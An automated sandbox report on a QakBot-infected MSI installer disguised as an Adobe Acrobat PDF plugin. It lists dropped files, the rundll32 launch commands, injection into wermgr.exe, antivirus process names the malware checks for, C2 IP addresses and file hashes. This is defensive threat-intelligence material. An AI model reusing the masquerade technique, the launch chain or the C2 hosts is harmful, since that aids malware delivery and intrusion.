            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10002523 mv_aes_crypt,4_2_10002523
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1004D583 mv_twofish_crypt,4_2_1004D583
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1001363B mv_encryption_init_info_alloc,4_2_1001363B
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1000867B mv_blowfish_crypt_ecb,4_2_1000867B
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100136FB mv_encryption_init_info_alloc,4_2_100136FB
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10013860 mv_encryption_init_info_add_side_data,mv_malloc,mv_malloc,4_2_10013860
            Source: C:\Windows\System32\msiexec.exe File opened: z:
            Source: C:\Windows\System32\msiexec.exe File opened: x:
            Source: C:\Windows\System32\msiexec.exe File opened: v:
            Source: C:\Windows\System32\msiexec.exe File opened: t:
            Source: C:\Windows\System32\msiexec.exe File opened: r:
            Source: C:\Windows\System32\msiexec.exe File opened: p:
            Source: C:\Windows\System32\msiexec.exe File opened: n:
            Source: C:\Windows\System32\msiexec.exe File opened: l:
            Source: C:\Windows\System32\msiexec.exe File opened: j:
            Source: C:\Windows\System32\msiexec.exe File opened: h:
            Source: C:\Windows\System32\msiexec.exe File opened: f:
            Source: C:\Windows\System32\msiexec.exe File opened: b:
            Source: C:\Windows\System32\msiexec.exe File opened: y:
            Source: C:\Windows\System32\msiexec.exe File opened: w:
            Source: C:\Windows\System32\msiexec.exe File opened: u:
            Source: C:\Windows\System32\msiexec.exe File opened: s:
            Source: C:\Windows\System32\msiexec.exe File opened: q:
            Source: C:\Windows\System32\msiexec.exe File opened: o:
            Source: C:\Windows\System32\msiexec.exe File opened: m:
            Source: C:\Windows\System32\msiexec.exe File opened: k:
            Source: C:\Windows\System32\msiexec.exe File opened: i:
            Source: C:\Windows\System32\msiexec.exe File opened: g:
            Source: C:\Windows\System32\msiexec.exe File opened: e:
            Source: C:\Windows\System32\wscript.exe File opened: c:
            Source: C:\Windows\System32\msiexec.exe File opened: a:

            Networking

            Source: unknown Network traffic detected: IP country count 30
            Source: Joe Sandbox View ASN Name: MEO-RESIDENCIALPT MEO-RESIDENCIALPT
            Source: Joe Sandbox View IP Address: 2.82.8.80 2.82.8.80
            Source: rundll32.exe, rundll32.exe, 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp, main.dll.1.dr String found in binary or memory: https://streams.videolan.org/upload/
            Source: 4.2.rundll32.exe.2c90000.0.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 4.2.rundll32.exe.2da0830.1.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
            Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
            Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\5334e9.msi
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5334e7.msi
            Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
            Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\r3zg12.msi"
            Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
            Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{8F685A84-3827-4907-9724-729A0BCDED7E}
            Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{A15EDEFB-4B9B-46D3-AB82-3EBC136071E3}
            Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{A15EDEFB-4B9B-46D3-AB82-3EBC136071E3}
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF29580D728BC5B4ED.TMP
            Source: classification engine Classification label: mal80.troj.evad.winMSI@10/21@0/100
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: main.dll.1.dr Static PE information: real checksum: 0xe9e0f should be: 0xee24d
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 4340 base: 63C50 value: E9 63 D7 71 02
            Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 2360 Thread sleep count: 176 > 30
            Source: C:\Windows\SysWOW64\wermgr.exe TID: 7104 Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 0.2 %
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10032510 rdtsc 4_2_10032510
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
            Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation

            Anti Debugging

            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10032510 Start: 100327F5 End: 1003263E 4_2_10032510
            Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10032510 rdtsc 4_2_10032510
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\wermgr.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1008B030 cpuid 4_2_1008B030
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1008F660 GetTimeZoneInformation,GetModuleHandleA,GetProcAddress, 4_2_1008F660
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1009E390 _errno,GetSystemTimeAsFileTime,GetSystemTimeAsFileTime,_errno,_errno, 4_2_1009E390
            Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
            Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
            Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
            Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
            Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
            Source: rundll32.exe, 00000004.00000003.367456417.0000000004B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match File source: 4.2.rundll32.exe.2c90000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.rundll32.exe.2da0830.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.rundll32.exe.2da0830.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000004.00000002.374504814.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.374584964.0000000004AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match File source: 4.2.rundll32.exe.2c90000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.rundll32.exe.2da0830.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.rundll32.exe.2da0830.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000004.00000002.374504814.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.374584964.0000000004AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            1 Replication Through Removable Media | 11 Scripting | 1 DLL Side-Loading | 11 Process Injection | 11 Masquerading | 1 Credential API Hooking | 2 System Time Discovery | 1 Replication Through Removable Media | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 2 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 2 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 1 Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Disable or Modify Tools | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 11 Process Injection | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 11 Scripting | LSA Secrets | 11 Peripheral Device Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Rundll32 | Cached Domain Credentials | 24 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            [Behavior graph] Behavior Graph ID: 878465; Sample: r3zg12.msi; Startdate: 30/05/2023; Architecture: WINDOWS; Score: 80. Processes: msiexec.exe dropped C:\Users\user\AppData\Local\...\main.dll (PE32) and started rundll32.exe and wscript.exe; rundll32.exe started a second rundll32.exe, which started wermgr.exe; a second msiexec.exe was also started. Network: 2.36.64.159 (VODAFONE-IT-ASNIT, Italy), 85.57.212.13 (UNI2-ASES, Spain), 98 other IPs or domains. Signatures: Found malware configuration; Yara detected Qbot; Sample uses string decryption to hide its real strings; C2 URLs / IPs found in malware configuration; Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Potentially malicious time measurement code found.

            Source | Detection | Scanner | Label | Link
            r3zg12.msi | 0% | ReversingLabs | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll | 3% | Virustotal | | Browse

            No Antivirus matches
            No contacted domains info

            Name | Source | Malicious | Antivirus Detection | Reputation
            https://streams.videolan.org/upload/ | rundll32.exe, rundll32.exe, 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp, main.dll.1.dr | false | | high
              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
              2.36.64.159
              unknownItaly
              30722VODAFONE-IT-ASNITtrue
              198.2.51.242
              unknownUnited States
              20001TWC-20001-PACWESTUStrue
              92.9.45.20
              unknownUnited Kingdom
              13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBtrue
              113.11.92.30
              unknownBangladesh
              7565BDCOM-BDRangsNiluSquare5thFloorHouse75Road5ADtrue
              109.50.149.241
              unknownPortugal
              2860NOS_COMUNICACOESPTtrue
              69.119.123.159
              unknownUnited States
              6128CABLE-NET-1UStrue
              172.115.17.50
              unknownUnited States
              20001TWC-20001-PACWESTUStrue
              147.219.4.194
              unknownUnited States
              1498DNIC-ASBLK-01498-01499UStrue
              Joe Sandbox Version:37.1.0 Beryl
              Analysis ID:878465
              Start date and time:2023-05-30 18:05:23 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 7m 50s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Run name:Potential for more IOCs and behavior
              Number of new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:r3zg12.msi
              Detection:MAL
              Classification:mal80.troj.evad.winMSI@10/21@0/100
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 15.6% (good quality ratio 7.1%)
              • Quality average: 20.6%
              • Quality standard deviation: 28.4%
              HCA Information:
              • Successful, ratio: 67%
              • Number of executed functions: 3
              • Number of non-executed functions: 171
              Cookbook Comments:
              • Found application associated with file extension: .msi
              • Close Viewer
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
              • Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              Time | Type | Description
              18:06:29 | API Interceptor | 9x Sleep call for process: wermgr.exe modified
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):8918
                                                    Entropy (8bit):5.546027034811531
                                                    Encrypted:false
                                                    SSDEEP:96:reeKeWZJS2URPw9CsvRqWURPw9C6jR8iU/vRqmHVPYaTNnohcw+n+PTLwCUVpTBs:rmejZwg3ZwgjlbQ3UVpW
                                                    MD5:C812AA360AFC13D5A8C4449856D77BA8
                                                    SHA1:CC95BB7FE63ECAA1B3B37AE30C6D2338AEB1DAB9
                                                    SHA-256:4CFFB89764A8A7C0EDE2242FB8968A6A2F1EEEF03B881A3A788FAA0DFA1F824A
                                                    SHA-512:AA60CBEC3A325A173D7E2406416320DDBFBE6E999829C37F36A541AF2FF8298AD8C668328BCFB3CDCA1BAE98334E762927A2ECB5CD8681BBFFBF55832BBE846A
                                                    Malicious:false
                                                    Preview:...@IXOS.@.....@..V.@.....@.....@.....@.....@.....@......&.{BADFC54D-C40E-45B2-8055-C154444F1F83}'.Adobe Acrobat PDF Browser Plugin 4.8.25..r3zg12.msi.@.....@.....@.....@........&.{880CDD59-0C2C-49AC-BA45-82BB01CD8BD1}.....@.....@.....@.....@.......@.....@.....@.......@....'.Adobe Acrobat PDF Browser Plugin 4.8.25......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{82B5B2FD-2237-42AB-9F03-B3B9EAB30000}&.{BADFC54D-C40E-45B2-8055-C154444F1F83}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..:.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\....B.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll....D.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs....WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....%.Software\AdobeAcrobatPDFBrowserPlugin...@....(.&...AdobeAcrobatPDFBro
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):952832
                                                    Entropy (8bit):6.765768694509863
                                                    Encrypted:false
                                                    SSDEEP:24576:UkgLxg2eMP8EN8Vo7zgDQ9uo4iZSBi/u3wXqx9jKVM5qx0YJ:x/jDQMo49wpq
                                                    MD5:5E107608DD00957472DB2C1FCC77599D
                                                    SHA1:D9BFA3E88CA0F86182CB84D4008AC6B346B755E9
                                                    SHA-256:185737016A01E84BF88523A4681723B4F2D0D22520E77B76740CC3C6323E38BF
                                                    SHA-512:22DFAE946F939EB361CEF49ED6EB953097A23A31BE0E97E6B7D31D3B2152C2371DA44E9E6BDD369E7145856BA75369FEA4DEAB18FA035E2A2CBD1E7D4E23CAF4
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m..d...........#...8...................................................... ...........@... .........................hC......<............................ ...?..........................$J.......................................................text...4...........................`.0`.data...............................@.0..rdata..|...........................@.0@.bss....D....p.......>................0..edata..hC.......D...>..............@.0@.idata..<...........................@.0..CRT....0...........................@.0..tls................................@.0..rsrc...b...........................@.0..reloc...?.......@...J..............@.0B................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):132
                                                    Entropy (8bit):4.599233980549996
                                                    Encrypted:false
                                                    SSDEEP:3:LwBxFkvH4dGmMKLVKRLGPz4VAFkvH4dGmMKLVKRLGH:cHFkvYdlZKRLi7FkvYdlZKRL4
                                                    MD5:0D4C9F15CE74465C59AE36A27F98C817
                                                    SHA1:9CCE8EEFA4D3D9C5E161C5DBB860CFE1489C6B1A
                                                    SHA-256:D24E3399060B51F3A1C9D41A67DE2601888A35C99DA8DB70070D757BB3F1913A
                                                    SHA-512:9BED0EAFC2CF2A2360850CA1070FFB04AC14F04C78379485998A93F45012B5C11CC7F6F68129F65B8B5F90437CB965908C6A1BB9D83A56B068D6BDE1D5FDAD1F
                                                    Malicious:false
                                                    Preview:MsgBox "Adobe Acrobat PDF Browser Plugin installation error 0x00000328", 16, "Adobe Acrobat PDF Browser Plugin installation error"..
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Acrobat PDF Browser Plugin 4.8.25, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Acrobat PDF Browser Plugin, Template: Intel;1033, Revision Number: {880CDD59-0C2C-49AC-BA45-82BB01CD8BD1}, Create Time/Date: Tue May 30 14:29:16 2023, Last Saved Time/Date: Tue May 30 14:29:16 2023, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                    Category:dropped
                                                    Size (bytes):507904
                                                    Entropy (8bit):7.919635795804226
                                                    Encrypted:false
                                                    SSDEEP:12288:vn+NgINNEcfjVRMigNFoILI8KviLjvhAN+S0w3:vnX9gjVRMDqH8fL1+35
                                                    MD5:665AFC8F8B7972F427FE1BD90D263032
                                                    SHA1:CC36E48F383750EB9416961B52EE3100B6E30688
                                                    SHA-256:D764436CAF7114D880F982D208BD9514A433772DCAC851F27C510D1597E26EDD
                                                    SHA-512:D30110DC240790A1F0C15DF31069D361F80DF327C258DD3305E70EB9EE3814C285AB6290E88E4072B375F7DAC3D183D22ABA29CB94FDD7DB937C4399C18AD37E
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Acrobat PDF Browser Plugin 4.8.25, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Acrobat PDF Browser Plugin, Template: Intel;1033, Revision Number: {880CDD59-0C2C-49AC-BA45-82BB01CD8BD1}, Create Time/Date: Tue May 30 14:29:16 2023, Last Saved Time/Date: Tue May 30 14:29:16 2023, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                    Category:dropped
                                                    Size (bytes):507904
                                                    Entropy (8bit):7.919635795804226
                                                    Encrypted:false
                                                    SSDEEP:12288:vn+NgINNEcfjVRMigNFoILI8KviLjvhAN+S0w3:vnX9gjVRMDqH8fL1+35
                                                    MD5:665AFC8F8B7972F427FE1BD90D263032
                                                    SHA1:CC36E48F383750EB9416961B52EE3100B6E30688
                                                    SHA-256:D764436CAF7114D880F982D208BD9514A433772DCAC851F27C510D1597E26EDD
                                                    SHA-512:D30110DC240790A1F0C15DF31069D361F80DF327C258DD3305E70EB9EE3814C285AB6290E88E4072B375F7DAC3D183D22ABA29CB94FDD7DB937C4399C18AD37E
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2138
                                                    Entropy (8bit):5.5791150458185745
                                                    Encrypted:false
                                                    SSDEEP:48:ZsT5zj3JwCP3RDufgFYjRBoD8SY1eU/rn7fnVaEVlt+Xt6q:G/hYjrAueIBaEP6
                                                    MD5:1F6513D8FA2AB1C6046B39CC245944A4
                                                    SHA1:B10AB5ACCE2B699F17C849407F8C3E7B3B1B8AFB
                                                    SHA-256:DB342F3508603862C738AA37C27F04FA57E10FFD7C165662DC2FE04DEF7BE192
                                                    SHA-512:71ECE8BDE50D6C91A79E43E3A3EDEC9B8B8B0B715ED7B5B0E20B82BC9845B28BC1B8981714876FCDA7BCEFEDE2A68C310C78528D5A58EBF54106589FE909A8CB
                                                    Malicious:false
                                                    Preview:...@IXOS.@.....@..V.@.....@.....@.....@.....@.....@......&.{BADFC54D-C40E-45B2-8055-C154444F1F83}'.Adobe Acrobat PDF Browser Plugin 4.8.25..r3zg12.msi.@.....@.....@.....@........&.{880CDD59-0C2C-49AC-BA45-82BB01CD8BD1}.....@.....@.....@.....@.......@.....@.....@.......@....'.Adobe Acrobat PDF Browser Plugin 4.8.25......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{82B5B2FD-2237-42AB-9F03-B3B9EAB30000}F.01:\Software\AdobeAcrobatPDFBrowserPlugin\AdobeAcrobatPDFBrowserPlugin.@.......@.....@.....@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@......:.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\..).1\xssanpen\|AdobeAcrobatPDFBrowserPlugin\......Please insert the disk: ..media3.cab.@.....@......C:\Windows\Installer\5334e7.msi.........@........main.dll..dll_main..main.dll.@.....@.....@.......@...
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):1.1624552326555946
                                                    Encrypted:false
                                                    SSDEEP:12:JSbX72FjQAGiLIlHVRpth/7777777777777777777777777vDHFZRwpSl0i8Q:JCQI5p0F
                                                    MD5:37AB2087D8192F73564465B95F0BDA79
                                                    SHA1:1406A27DC80D84250F76BF21BD56687AC594249F
                                                    SHA-256:9D7BD6336C836A1991242C4A183A064021894E9A9F38F8CC6081274863C54DA7
                                                    SHA-512:BBE40C0FAAB13636E98612B8805A8516026C839567AC998224CC8F8998E7A375E488E8DD33908401CEF9FC62CBB9A6D8F8F7100001E7205F90B449EFB8740948
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):1.5060877643473185
                                                    Encrypted:false
                                                    SSDEEP:48:58PhfuRc06WXJ8FT5K0gMPduLMS5kArD6uLMSI818lP7AWMN:0hf1fFT3TPRtfA
                                                    MD5:430F2ADF3561DDB478079AF68E971D68
                                                    SHA1:7431BA57FB0275B6276BBA7370A317D67552D8B6
                                                    SHA-256:8A709B97AFBFAA9E5CD5D3C566F95D370FE69AC31260A6F3C2FF82619F3D1026
                                                    SHA-512:5A3904A81D986EE27F31D27383BB70BE01C709BFF580B7CD2AF184F8C8539439A3F38821B5C0D32B42F57DF0B92BC771B5ED7264082F842D19F346D3667C669A
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):192827
                                                    Entropy (8bit):5.392009325809667
                                                    Encrypted:false
                                                    SSDEEP:3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bFd:i0LVlAb
                                                    MD5:3B520410F621CAAC0C856D080A24DC73
                                                    SHA1:62B660B648C06F16DFDEE47AC468EF44F9E81D14
                                                    SHA-256:D71D62F7FA3DAF2E96B31CF428170D103C5D17C9326C1BCA9805C6FA561F2F40
                                                    SHA-512:412F894D897944A54401373C827D06E0C7A48F63B809E3441EE8B8ABDBFA19F5A6B0C8C0A3E8FDDF9DD32BB6051623C5C404DEB241C993BE50CE8DDBBABAB50C
                                                    Malicious:false
